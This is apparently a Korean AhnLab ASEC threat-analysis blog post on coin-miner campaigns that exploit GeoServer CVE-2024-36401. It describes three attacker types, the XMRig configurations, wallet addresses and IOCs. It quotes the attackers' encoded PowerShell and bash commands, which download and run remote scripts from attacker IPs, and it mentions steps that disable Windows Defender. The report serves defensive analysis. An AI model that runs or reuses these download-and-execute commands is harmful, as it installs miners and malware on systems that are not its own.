다양한 코인 마이너 공격 사례가 확인되고 있는 GeoServer

AhnLab SEcurity intelligence Center(ASEC)은 과거 “GeoServer 취약점을 악용하는 코인 마이너 공격 사례” 블로그를 통해 공격자들이 취약점이 패치되지 않은 GeoServer를 공격해 코인 마이너와 NetCat을 설치한 공격 사례를 다루었다. [1] 취약한 GeoServer를 대상으로 한 공격 사례는 최근까지도 지속적으로 확인되고 있으며 모두 코인 마이너를 설치하는 것이 특징이다. 여기에서는 확인된 코인 마이너 설치 사례들을 다룬다.

 

1. GeoServer

GeoServer는 Java로 작성된 오픈소스 GIS(Geographic Information System) 서버로서 지리 공간 데이터 처리 기능을 지원하는 플랫폼이다. 2024년 인증되지 않은 사용자가 원격 코드를 실행할 수 있는 취약점 CVE-2024-36401가 공개되었으며 이후 다양한 공격자들이 이를 악용해 악성코드를 설치하고 있다.

2024년 9월 Fortinet사는 CVE-2024-36401 취약점을 악용해 GOREVERSE, SideWalk, Mirai, Condi, CoinMiner 등의 악성코드들을 유포하는 공격 사례들을 공개하였다. [2] 그리고 TrendMicro사에서도 Earth Baxia 공격자의 공격 캠페인을 공개하였는데 대만의 지역 기관을 대상으로 스피어 피싱과 함께 CVE-2024-36401 취약점이 악용된 것으로 알려졌다. [3]

공격자들이 어떤 방식을 악용해 공격하였는지에 대한 구체적인 정황은 알 수 없지만 취약한 버전의 GeoServer가 설치된 환경이 공격 대상이기 때문에 알려진 취약점을 악용하였을 것으로 보인다. 

 

2. 코인 마이너 공격 사례

2.1. Type A

Type A는 이전 블로그에서 소개한 것과 동일한 공격자로서 동일한 지갑 주소가 사용되고 있다. 공격자는 취약한 GeoServer를 공격해 다음과 같은 파워쉘 명령을 실행하기도 하였으며 “bash.exe”를 악용해 Bash 스크립트를 실행하기도 하였다.

> powershell.exe -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMgAyADAALgA4ADQALgAxADAANwAuADYAOQAvAGoAcwAvAGcAdwAuAHQAeAB0ACcAKQA=
> bash -c {echo,Y3VybCAtZnNTTCBodHRwOi8vMjIwLjg0LjEwNy42OS9qcy9nbC50eHQgfHNoCg==}|{base64,-d}|{bash,-i}

XMRig 코인 마이너를 포함한 악성코드들은 다음과 같은 주소에 업로드되어 있으며 Batch 악성코드 “gw.txt” 또는 Bash 악성코드 “gl.txt”에 의해 다운로드되어 설치된다. 윈도우 및 리눅스 환경을 대상으로 코인 마이너를 설치 과정은 이전과 동일하며 사용되는 악성코드와 다운로드 주소만 변경되었다.

Figure 1. 악성코드가 업로드된 주소

• url – 1 : pool.supportxmr[.]com:443
• url – 2 : 104.243.43[.]115:443
• user : “47DsNc5pK8rYBQF4ev3mNBct3tkkHuUmxeqCSSbX3YuBhXweSB9XeQbcPMqEBaSJy4bGrPxbdMJkphrVQ5AmastoEMpSjcU”
• pass : “x”

참고로 동일한 공격자는 WegLogic 서버를 대상으로도 코인 마이너를 유포하고 있는데 외부에 노출된 불특정 다수의 시스템들을 스캐닝하면서 취약한 서비스가 확인되는 경우 코인 마이너를 설치하고 있는 것으로 보인다. 

> powershell.exe -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAxADkALgAxADkANAAuADEANQAzAC4AMwAxADoAOAAwADgAMAAvAGkAYwBvAG4ALwBqAHMALwB3AGkALgB0AHgAdAAnACk

Figure 2. WegLogic 서비스에 의해 실행된 코인 마이너 설치 명령

• url – 1 : pool.supportxmr[.]com:80
• user : “47KoSaQXtpZ2AypuUm6pBgfUjfUuS1Fiy2jJRajdztpzGHrtLk3qPtQExCMd9PuRkBWPU4tDfoT7jXnYJPyEpDiF6qNuR7R”
• pass : “x”

 

2.2. Type B

또 다른 공격자는 certutil 명령으로 악성코드를 설치하였다. 최초 설치된 악성코드는 RAR SFX 포맷의 드로퍼로서 내부에 XMRig와 설정 정보를 가지고 있다.

Figure 3. certutil을 이용한 악성코드 설치 행위

실행 시 “C:\Program Files\Java\jre1.9.2_251” 경로에 악성코드들을 설치하며 이후 “3.bat”을 실행한다. “3.bat”은 “bin” 폴더에 위치한 “javaws.exe” 즉 NSSM을 이용해 XMRig인 “java.exe”를 실행한다.

Figure 4. 드로퍼 악성코드의 내부 파일

참고로 XMRig는 공격자가 직접 제작한 형태로서 “config.json”과 같은 추가적인 설정 파일 대신 내부에 설정 데이터가 포함된 형태이다. “javap.exe”는 로더인데 동일 경로의 “hello.dat” 파일을 읽어와 복호화하여 메모리에서 실행하는데 복호화된 것은 앞의 유형과 동일하게 마이닝 풀 주소와 같은 설정 정보를 포함한 XMRig이다.

Figure 5. XMRig에 포함된 설정 정보

• url – 1 : ssl.aaaaaaaa[.]cyou:9655
• url – 2 : ssl.aaaaaaaa[.]cyou:9654
• url – 3 : xmr.aaaaaaaa[.]cyou:1110
• url – 4 : aaaaaaaa[.]cyou:443
• url – 5 : asia.aaaaaaaa[.]cyou:1110
• url – 6 : us.aaaaaaaa[.]cyou:1110
• url – 7 : eu.aaaaaaaa[.]cyou:1110
• user : “45PX6QS4EhgRC1YbPNPRz8GmhyF7N4WVxQssZnhhc7xodKNNrQiEqxz9uQEMD6e8isjHVHt3Vk9Nqh5HMRgjVw4RC61FY5W”
• pass – 1 : “x1999”
• pass – 2 : “x”

 

2.3. Type C

마지막 공격자는 코인 마이너 외에도 AnyDesk를 설치한 정황과 자체 제작한 다운로더가 함께 사용된 것이 특징이지만 현재 기준 다운로드가 불가하여 어떠한 페이로드를 다운로드하였을지는 알 수 없다.

공격자는 GeoServer를 통해 실행한 파워쉘 명령으로 XMRig를 설치하는 기능을 담당하는 Batch 악성코드 “setupcache.bat”를 설치하였다. 참고로 “Setup_AnyDesk.bat”는 확보되지 않았지만 이름으로 추정했을 때 AnyDesk를 설치하는 Batch 스크립트로 추정된다.

“setupcache.bat”는 7z, NSSM 그리고 XMRig가 포함된 압축 파일 “caches.zip”을 다운로드하며 7z를 이용해 압축을 해제하고 NSSM을 이용해 XMRig를 서비스로 설치한다. 참고로 다양한 공격 사례들에서 적어도 5개의 다운로드 주소가 확인되었으며 압축 파일의 이름 또한 “caches.zip”뿐만 아니라 “cache.zip”, “w3wp.zip”, “iis.zip” 등이 사용되었다.

Figure 6. 다운로더 기능을 담당하는 Batch 악성코드

이외에도 자체 제작한 다운로더 악성코드 “systemd”를 설치하고 윈도우 디펜더 예외 경로 추가 및 비활성화를 시도하였다. 다운로더는 C&C 서버에로부터 페이로드를 다운로드해 메모리에서 실행하는 기능을 담당하지만 분석 시점 기준 다운로드가 불가능해 최종 악성코드에 대한 정보는 알 수 없다. 

Figure 7. 다운로더 설치 및 윈도우 디펜더 우회 루틴

• url – 1 : www[.]combilke[.]top:9200
• url – 2 : www[.]combilkee[.]top:9200
• url – 3 : www[.]cloudsecure[.]top:9200
• url – 4 : 154.89.152[.]204:9200
• url – 5 : 203.91.76[.]58:9200
• user : “49Qp2aEzUdEANd88muJEvDVKEzn9xbm5xEXjZ8QUeN1ndVxvtUuSjZAecFJHabrzYE2VXTu5sZM8H5GiKfKah1VJBwuWhYc”
• pass – 1 : “k2_7”
• pass – 2 : “k2_2”

Figure 8. 다운로더 악성코드

 

3. 결론

GeoServer의 원격 코드 실행 취약점(CVE-2024-36401)이 공개된 이후 최근까지도 해당 취약점을 악용해 악성코드를 설치하는 사례들이 확인되고 있다. 공격자는 윈도우와 리눅스 환경을 포함해 취약한 GeoServer가 설치된 환경을 공격 대상으로 하고 있으며 다양한 코인 마이너들을 설치하였다. 코인 마이너가 설치될 경우 시스템의 자원을 이용해 공격자의 모네로 코인을 채굴하게 되며, 공격자는 추후 함께 설치한 NetCat을 이용해 또 다른 악성코드를 설치하거나 시스템 내의 정보를 탈취하는 등 다양한 악성 행위를 수행할 수 있다.

 

MD5

04101ba4061732ed0716f554cb7d6539

05fe0e7e4e181ee77749f334e2d7b10f

1136efb1a46d1f2d508162387f30dc4d

21c5171fb746b93913efdaac328d91bd

2517826a165193105923233e13b418d4

URL

http[:]//119[.]194[.]153[.]31[:]8080/icon/js/config[.]json

http[:]//119[.]194[.]153[.]31[:]8080/icon/js/l[.]txt

http[:]//119[.]194[.]153[.]31[:]8080/icon/js/p[.]sh

http[:]//119[.]194[.]153[.]31[:]8080/icon/js/s[.]rar

http[:]//119[.]194[.]153[.]31[:]8080/icon/js/solrd[.]exe

FQDN

aaaaaaaa[.]cyou

asia[.]aaaaaaaa[.]cyou

eu[.]aaaaaaaa[.]cyou

ssl[.]aaaaaaaa[.]cyou

us[.]aaaaaaaa[.]cyou

IP

104[.]243[.]43[.]115

154[.]89[.]152[.]204

185[.]208[.]156[.]197

203[.]91[.]76[.]58